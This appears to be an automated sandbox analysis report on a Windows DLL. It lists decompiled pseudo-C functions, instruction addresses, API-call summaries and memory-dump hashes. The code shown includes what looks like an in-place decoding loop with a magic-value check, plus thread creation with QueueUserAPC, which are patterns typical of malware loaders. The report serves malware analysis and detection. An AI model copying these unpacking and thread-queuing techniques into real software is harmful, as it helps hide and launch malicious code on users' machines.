                                                                                                                                                                                                                                                              					E6E20136A(_t44);
                                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              			}





















                                                                                                                                                                                                                                                              0x6e2017b3
                                                                                                                                                                                                                                                              0x6e2017bc
                                                                                                                                                                                                                                                              0x6e2017c0
                                                                                                                                                                                                                                                              0x6e2018c8
                                                                                                                                                                                                                                                              0x6e2018ce
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2017c6
                                                                                                                                                                                                                                                              0x6e2017c6
                                                                                                                                                                                                                                                              0x6e2017cb
                                                                                                                                                                                                                                                              0x6e2017d1
                                                                                                                                                                                                                                                              0x6e2017e0
                                                                                                                                                                                                                                                              0x6e2017e1
                                                                                                                                                                                                                                                              0x6e2017e4
                                                                                                                                                                                                                                                              0x6e2017e7
                                                                                                                                                                                                                                                              0x6e2017f0
                                                                                                                                                                                                                                                              0x6e2017f4
                                                                                                                                                                                                                                                              0x6e2017fa
                                                                                                                                                                                                                                                              0x6e2017fe
                                                                                                                                                                                                                                                              0x6e201805
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e20180b
                                                                                                                                                                                                                                                              0x6e201812
                                                                                                                                                                                                                                                              0x6e201816
                                                                                                                                                                                                                                                              0x6e2018b9
                                                                                                                                                                                                                                                              0x6e2018b9
                                                                                                                                                                                                                                                              0x6e2018c0
                                                                                                                                                                                                                                                              0x6e2018c2
                                                                                                                                                                                                                                                              0x6e2018c2
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2018c0
                                                                                                                                                                                                                                                              0x6e20181f
                                                                                                                                                                                                                                                              0x6e201872
                                                                                                                                                                                                                                                              0x6e201872
                                                                                                                                                                                                                                                              0x6e201883
                                                                                                                                                                                                                                                              0x6e201887
                                                                                                                                                                                                                                                              0x6e2018b5
                                                                                                                                                                                                                                                              0x6e201889
                                                                                                                                                                                                                                                              0x6e20188c
                                                                                                                                                                                                                                                              0x6e201894
                                                                                                                                                                                                                                                              0x6e201898
                                                                                                                                                                                                                                                              0x6e2018a0
                                                                                                                                                                                                                                                              0x6e2018a0
                                                                                                                                                                                                                                                              0x6e2018a7
                                                                                                                                                                                                                                                              0x6e2018a7
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201887
                                                                                                                                                                                                                                                              0x6e20182d
                                                                                                                                                                                                                                                              0x6e20186c
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e20186c
                                                                                                                                                                                                                                                              0x6e20182f
                                                                                                                                                                                                                                                              0x6e201833
                                                                                                                                                                                                                                                              0x6e20183e
                                                                                                                                                                                                                                                              0x6e201842
                                                                                                                                                                                                                                                              0x6e201864
                                                                                                                                                                                                                                                              0x6e201864
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201864
                                                                                                                                                                                                                                                              0x6e201844
                                                                                                                                                                                                                                                              0x6e201849
                                                                                                                                                                                                                                                              0x6e201850
                                                                                                                                                                                                                                                              0x6e201855
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201857
                                                                                                                                                                                                                                                              0x6e20185a
                                                                                                                                                                                                                                                              0x6e20185d
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e20185d

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 6E20146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E2017B8,74B063F0,00000000), ref: 6E20147B
                                                                                                                                                                                                                                                                • Part of subcall function 6E20146C: GetVersion.KERNEL32 ref: 6E20148A
                                                                                                                                                                                                                                                                • Part of subcall function 6E20146C: GetCurrentProcessId.KERNEL32 ref: 6E201499
                                                                                                                                                                                                                                                                • Part of subcall function 6E20146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E2014B2
                                                                                                                                                                                                                                                              • GetSystemTime.KERNEL32(?,74B063F0,00000000), ref: 6E2017CB
                                                                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 6E2017D1
                                                                                                                                                                                                                                                                • Part of subcall function 6E2015A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E2015F9
                                                                                                                                                                                                                                                                • Part of subcall function 6E2015A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E2017EC), ref: 6E20168B
                                                                                                                                                                                                                                                                • Part of subcall function 6E2015A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6E2016A6
                                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000000,00000000), ref: 6E2017F4
                                                                                                                                                                                                                                                              • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E20183C
                                                                                                                                                                                                                                                              • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E20185A
                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,6E2016EC,?,00000000), ref: 6E20188C
                                                                                                                                                                                                                                                              • GetExitCodeThread.KERNEL32(00000000,?), ref: 6E2018A0
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6E2018A7
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(6E2016EC,?,00000000), ref: 6E2018AF
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6E2018C2
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471393143.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471383950.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471419429.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471444834.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471467724.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2280543912-0
                                                                                                                                                                                                                                                              • Opcode ID: b506397c79bbf89a0cdcedb505f99895aae3a702b921f87fab97e550b1841a5b
                                                                                                                                                                                                                                                              • Instruction ID: 4e5c29af83dd035778fb99b17fb11bcb41987480e870181db912d6594c354842
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b506397c79bbf89a0cdcedb505f99895aae3a702b921f87fab97e550b1841a5b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D31827180571A9BE750DFA5888CD5B77FFFE86759B100A1AF560C21C0E770C688C6B2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                                              			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                                              				void* __ebp;
                                                                                                                                                                                                                                                              				char _t9;
                                                                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                                                                              				void* _t18;
                                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                                              				void* _t36;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                                              				_t9 = _a8;
                                                                                                                                                                                                                                                              				_v8 = 1;
                                                                                                                                                                                                                                                              				if(_t9 == 0) {
                                                                                                                                                                                                                                                              					_t10 = InterlockedDecrement(0x6e204188);
                                                                                                                                                                                                                                                              					__eflags = _t10;
                                                                                                                                                                                                                                                              					if(_t10 == 0) {
                                                                                                                                                                                                                                                              						__eflags =  *0x6e20418c;
                                                                                                                                                                                                                                                              						if( *0x6e20418c != 0) {
                                                                                                                                                                                                                                                              							_t36 = 0x2328;
                                                                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                                                                              								SleepEx(0x64, 1);
                                                                                                                                                                                                                                                              								__eflags =  *0x6e204198;
                                                                                                                                                                                                                                                              								if( *0x6e204198 == 0) {
                                                                                                                                                                                                                                                              									break;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								_t36 = _t36 - 0x64;
                                                                                                                                                                                                                                                              								__eflags = _t36;
                                                                                                                                                                                                                                                              								if(_t36 > 0) {
                                                                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								break;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							CloseHandle( *0x6e20418c);
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              						HeapDestroy( *0x6e204190);
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                                              					if(_t9 == 1 && InterlockedIncrement(0x6e204188) == 1) {
                                                                                                                                                                                                                                                              						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                                              						_t41 = _t18;
                                                                                                                                                                                                                                                              						 *0x6e204190 = _t18;
                                                                                                                                                                                                                                                              						if(_t18 == 0) {
                                                                                                                                                                                                                                                              							L6:
                                                                                                                                                                                                                                                              							_v8 = 0;
                                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                                              							 *0x6e2041b0 = _a4;
                                                                                                                                                                                                                                                              							asm("lock xadd [eax], edi");
                                                                                                                                                                                                                                                              							_push( &_a8);
                                                                                                                                                                                                                                                              							_t23 = E6E201CA4(E6E201D32, E6E201EE0(_a12, 1, 0x6e204198, _t41));
                                                                                                                                                                                                                                                              							 *0x6e20418c = _t23;
                                                                                                                                                                                                                                                              							if(_t23 == 0) {
                                                                                                                                                                                                                                                              								asm("lock xadd [esi], eax");
                                                                                                                                                                                                                                                              								goto L6;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				return _v8;
                                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                                              0x6e201e07
                                                                                                                                                                                                                                                              0x6e201e13
                                                                                                                                                                                                                                                              0x6e201e15
                                                                                                                                                                                                                                                              0x6e201e18
                                                                                                                                                                                                                                                              0x6e201e8e
                                                                                                                                                                                                                                                              0x6e201e94
                                                                                                                                                                                                                                                              0x6e201e96
                                                                                                                                                                                                                                                              0x6e201e98
                                                                                                                                                                                                                                                              0x6e201e9e
                                                                                                                                                                                                                                                              0x6e201ea0
                                                                                                                                                                                                                                                              0x6e201ea5
                                                                                                                                                                                                                                                              0x6e201ea8
                                                                                                                                                                                                                                                              0x6e201eb3
                                                                                                                                                                                                                                                              0x6e201eb5
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201eb7
                                                                                                                                                                                                                                                              0x6e201eba
                                                                                                                                                                                                                                                              0x6e201ebc
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201ebc
                                                                                                                                                                                                                                                              0x6e201ec4
                                                                                                                                                                                                                                                              0x6e201ec4
                                                                                                                                                                                                                                                              0x6e201ed0
                                                                                                                                                                                                                                                              0x6e201ed0
                                                                                                                                                                                                                                                              0x6e201e1a
                                                                                                                                                                                                                                                              0x6e201e1b
                                                                                                                                                                                                                                                              0x6e201e3b
                                                                                                                                                                                                                                                              0x6e201e41
                                                                                                                                                                                                                                                              0x6e201e43
                                                                                                                                                                                                                                                              0x6e201e48
                                                                                                                                                                                                                                                              0x6e201e84
                                                                                                                                                                                                                                                              0x6e201e84
                                                                                                                                                                                                                                                              0x6e201e4a
                                                                                                                                                                                                                                                              0x6e201e52
                                                                                                                                                                                                                                                              0x6e201e59
                                                                                                                                                                                                                                                              0x6e201e63
                                                                                                                                                                                                                                                              0x6e201e6f
                                                                                                                                                                                                                                                              0x6e201e76
                                                                                                                                                                                                                                                              0x6e201e7b
                                                                                                                                                                                                                                                              0x6e201e80
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201e80
                                                                                                                                                                                                                                                              0x6e201e7b
                                                                                                                                                                                                                                                              0x6e201e48
                                                                                                                                                                                                                                                              0x6e201e1b
                                                                                                                                                                                                                                                              0x6e201edd

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(6E204188), ref: 6E201E26
                                                                                                                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E201E3B
                                                                                                                                                                                                                                                                • Part of subcall function 6E201CA4: CreateThread.KERNELBASE ref: 6E201CBB
                                                                                                                                                                                                                                                                • Part of subcall function 6E201CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E201CD0
                                                                                                                                                                                                                                                                • Part of subcall function 6E201CA4: GetLastError.KERNEL32(00000000), ref: 6E201CDB
                                                                                                                                                                                                                                                                • Part of subcall function 6E201CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6E201CE5
                                                                                                                                                                                                                                                                • Part of subcall function 6E201CA4: CloseHandle.KERNEL32(00000000), ref: 6E201CEC
                                                                                                                                                                                                                                                                • Part of subcall function 6E201CA4: SetLastError.KERNEL32(00000000), ref: 6E201CF5
                                                                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(6E204188), ref: 6E201E8E
                                                                                                                                                                                                                                                              • SleepEx.KERNEL32(00000064,00000001), ref: 6E201EA8
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 6E201EC4
                                                                                                                                                                                                                                                              • HeapDestroy.KERNEL32 ref: 6E201ED0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471393143.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471383950.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471419429.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471444834.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471467724.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2110400756-0
                                                                                                                                                                                                                                                              • Opcode ID: 6a1c31c51e102700e5bd65411e26f0b44efeafe804a09c5d3cfb8b7600d33b06
                                                                                                                                                                                                                                                              • Instruction ID: ee1cf1b41f7b99f91a757e30858cd2d21c2cc70094f9a10052d359d57c3d86c7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a1c31c51e102700e5bd65411e26f0b44efeafe804a09c5d3cfb8b7600d33b06
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9218471A0060AEBCB409FD9CC8CE5EBBABFB66369714842DE505D31C0E7708945CB70
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                                              			E6E201CA4(long _a4, DWORD* _a12) {
                                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v0;
                                                                                                                                                                                                                                                              				void* _t4;
                                                                                                                                                                                                                                                              				long _t6;
                                                                                                                                                                                                                                                              				long _t11;
                                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e2041cc, 0, _a12); // executed
                                                                                                                                                                                                                                                              				_t13 = _t4;
                                                                                                                                                                                                                                                              				if(_t13 != 0) {
                                                                                                                                                                                                                                                              					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                                                                                                                                                                                                              					if(_t6 == 0) {
                                                                                                                                                                                                                                                              						_t11 = GetLastError();
                                                                                                                                                                                                                                                              						TerminateThread(_t13, _t11);
                                                                                                                                                                                                                                                              						CloseHandle(_t13);
                                                                                                                                                                                                                                                              						_t13 = 0;
                                                                                                                                                                                                                                                              						SetLastError(_t11);
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				return _t13;
                                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                                              0x6e201cbb
                                                                                                                                                                                                                                                              0x6e201cc1
                                                                                                                                                                                                                                                              0x6e201cc5
                                                                                                                                                                                                                                                              0x6e201cd0
                                                                                                                                                                                                                                                              0x6e201cd8
                                                                                                                                                                                                                                                              0x6e201ce1
                                                                                                                                                                                                                                                              0x6e201ce5
                                                                                                                                                                                                                                                              0x6e201cec
                                                                                                                                                                                                                                                              0x6e201cf3
                                                                                                                                                                                                                                                              0x6e201cf5
                                                                                                                                                                                                                                                              0x6e201cfb
                                                                                                                                                                                                                                                              0x6e201cd8
                                                                                                                                                                                                                                                              0x6e201cff

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateThread.KERNELBASE ref: 6E201CBB
                                                                                                                                                                                                                                                              • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E201CD0
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 6E201CDB
                                                                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000,00000000), ref: 6E201CE5
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6E201CEC
                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 6E201CF5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471393143.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471383950.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471419429.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471444834.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000002.00000002.471467724.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3832013932-0
                                                                                                                                                                                                                                                              • Opcode ID: 08245ec61b8de3c6cd9aa21b34f451a5f88f4773593651c336bb16d0eecc95d6
                                                                                                                                                                                                                                                              • Instruction ID: cb538d8c5c5344ca38fe04e47bf13e4e498013f2a567c3afe4fbba3e043af4aa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08245ec61b8de3c6cd9aa21b34f451a5f88f4773593651c336bb16d0eecc95d6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12F01C36606A22BBDB525BA08C0CF5BBF6BFB1A752F00440DFA09911D0C7A18A55DBB5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3136044242-0
                                                                                                                                                                                                                                                              • Opcode ID: e19c01fcb2dabf9c0c44a239570506d0250d6b4427132a8591807f2bc07d51fd
                                                                                                                                                                                                                                                              • Instruction ID: 705ad72f6a5fe38e9a0e5b315135d9e22414935cab2c587c03429561aff63af6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e19c01fcb2dabf9c0c44a239570506d0250d6b4427132a8591807f2bc07d51fd
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0215E71D0061EEBDB6A8F95C840EAE3A7BDB85B95B014525FC255E290C7308E418BA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6E247387
                                                                                                                                                                                                                                                                • Part of subcall function 6E247BA4: RtlInitializeSListHead.NTDLL(6E28C780), ref: 6E247BA9
                                                                                                                                                                                                                                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E2473F1
                                                                                                                                                                                                                                                              • ___scrt_fastfail.LIBCMT ref: 6E24743B
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000002.00000002.471489617.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                                              • String ID: y$n
                                                                                                                                                                                                                                                              • API String ID: 2097537958-731774800
                                                                                                                                                                                                                                                              • Opcode ID: 03c773252a9e12d70e1c67b1885047d40bc49dc83ff66e8d85105ef952ee57e9
                                                                                                                                                                                                                                                              • Instruction ID: 8954ef7617c6d924e6ce9f91539b90214a53234a7020ba776fc2eebe994fa279
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03c773252a9e12d70e1c67b1885047d40bc49dc83ff66e8d85105ef952ee57e9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF218B7A54820FDBDB096BF8D8097EC3B679F1672EF148859D8A12B2C0CF610059CA66
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                                                                                                              			E6E2015A3(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                                                                                              				unsigned int _v12;
                                                                                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                                                                                              				void* _v36;
                                                                                                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                                                                                                              				signed int _v48;
                                                                                                                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                                                                                              				intOrPtr _t47;
                                                                                                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                                                                                                              				signed int _t59;
                                                                                                                                                                                                                                                              				signed int _t61;
                                                                                                                                                                                                                                                              				intOrPtr _t66;
                                                                                                                                                                                                                                                              				intOrPtr _t77;
                                                                                                                                                                                                                                                              				void* _t78;
                                                                                                                                                                                                                                                              				signed int _t80;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t77 =  *0x6e2041b0;
                                                                                                                                                                                                                                                              				_t39 = E6E201A4B(_t77,  &_v20,  &_v12);
                                                                                                                                                                                                                                                              				_v16 = _t39;
                                                                                                                                                                                                                                                              				if(_t39 == 0) {
                                                                                                                                                                                                                                                              					asm("sbb ebx, ebx");
                                                                                                                                                                                                                                                              					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                                                                                                                                                                                                                                                              					_t78 = _t77 + _v20;
                                                                                                                                                                                                                                                              					_v36 = _t78;
                                                                                                                                                                                                                                                              					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                                                                                                                                                                                                                                                              					_v24 = _t46;
                                                                                                                                                                                                                                                              					if(_t46 == 0) {
                                                                                                                                                                                                                                                              						_v16 = 8;
                                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                                              						_t61 = 0;
                                                                                                                                                                                                                                                              						if(_t59 <= 0) {
                                                                                                                                                                                                                                                              							_t47 =  *0x6e2041cc;
                                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                                              							_t66 = _a4;
                                                                                                                                                                                                                                                              							_t50 = _t46 - _t78;
                                                                                                                                                                                                                                                              							_t11 = _t66 + 0x6e205137; // 0x6e205137
                                                                                                                                                                                                                                                              							_v28 = _t50;
                                                                                                                                                                                                                                                              							_v32 = _t50 + _t11;
                                                                                                                                                                                                                                                              							_v8 = _t78;
                                                                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                                                                              								asm("movsd");
                                                                                                                                                                                                                                                              								asm("movsd");
                                                                                                                                                                                                                                                              								asm("movsd");
                                                                                                                                                                                                                                                              								_t19 = _t61 + 1; // 0x2
                                                                                                                                                                                                                                                              								_t80 = _t19;
                                                                                                                                                                                                                                                              								E6E201D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                                                                                                                                                                                                                                                              								_t64 = _v32;
                                                                                                                                                                                                                                                              								_v8 = _v8 + 0x1000;
                                                                                                                                                                                                                                                              								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                                                                                                                                                                                                                                                              								_t61 = _t80;
                                                                                                                                                                                                                                                              								 *0x6e2041cc = _t47;
                                                                                                                                                                                                                                                              								if(_t61 >= _t59) {
                                                                                                                                                                                                                                                              									break;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								_t50 = _v28;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              						if(_t47 != 0x63699bc3) {
                                                                                                                                                                                                                                                              							_v16 = 0xc;
                                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                                              							memcpy(_v36, _v24, _v12);
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              						VirtualFree(_v24, 0, 0x8000); // executed
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				return _v16;
                                                                                                                                                                                                                                                              			}























                                                                                                                                                                                                                                                              0x6e2015aa
                                                                                                                                                                                                                                                              0x6e2015ba
                                                                                                                                                                                                                                                              0x6e2015c1
                                                                                                                                                                                                                                                              0x6e2015c4
                                                                                                                                                                                                                                                              0x6e2015d9
                                                                                                                                                                                                                                                              0x6e2015e0
                                                                                                                                                                                                                                                              0x6e2015e5
                                                                                                                                                                                                                                                              0x6e2015f6
                                                                                                                                                                                                                                                              0x6e2015f9
                                                                                                                                                                                                                                                              0x6e201601
                                                                                                                                                                                                                                                              0x6e201604
                                                                                                                                                                                                                                                              0x6e2016ae
                                                                                                                                                                                                                                                              0x6e20160a
                                                                                                                                                                                                                                                              0x6e20160a
                                                                                                                                                                                                                                                              0x6e20160e
                                                                                                                                                                                                                                                              0x6e201676
                                                                                                                                                                                                                                                              0x6e201610
                                                                                                                                                                                                                                                              0x6e201610
                                                                                                                                                                                                                                                              0x6e201613
                                                                                                                                                                                                                                                              0x6e201615
                                                                                                                                                                                                                                                              0x6e20161d
                                                                                                                                                                                                                                                              0x6e201620
                                                                                                                                                                                                                                                              0x6e201623
                                                                                                                                                                                                                                                              0x6e20162b
                                                                                                                                                                                                                                                              0x6e201633
                                                                                                                                                                                                                                                              0x6e201634
                                                                                                                                                                                                                                                              0x6e201635
                                                                                                                                                                                                                                                              0x6e20163c
                                                                                                                                                                                                                                                              0x6e20163c
                                                                                                                                                                                                                                                              0x6e201650
                                                                                                                                                                                                                                                              0x6e201655
                                                                                                                                                                                                                                                              0x6e20165e
                                                                                                                                                                                                                                                              0x6e201665
                                                                                                                                                                                                                                                              0x6e201668
                                                                                                                                                                                                                                                              0x6e20166c
                                                                                                                                                                                                                                                              0x6e201671
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201628
                                                                                                                                                                                                                                                              0x6e201628
                                                                                                                                                                                                                                                              0x6e201673
                                                                                                                                                                                                                                                              0x6e201680
                                                                                                                                                                                                                                                              0x6e201695
                                                                                                                                                                                                                                                              0x6e201682
                                                                                                                                                                                                                                                              0x6e20168b
                                                                                                                                                                                                                                                              0x6e201690
                                                                                                                                                                                                                                                              0x6e2016a6
                                                                                                                                                                                                                                                              0x6e2016a6
                                                                                                                                                                                                                                                              0x6e2016b5
                                                                                                                                                                                                                                                              0x6e2016bb

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E2015F9
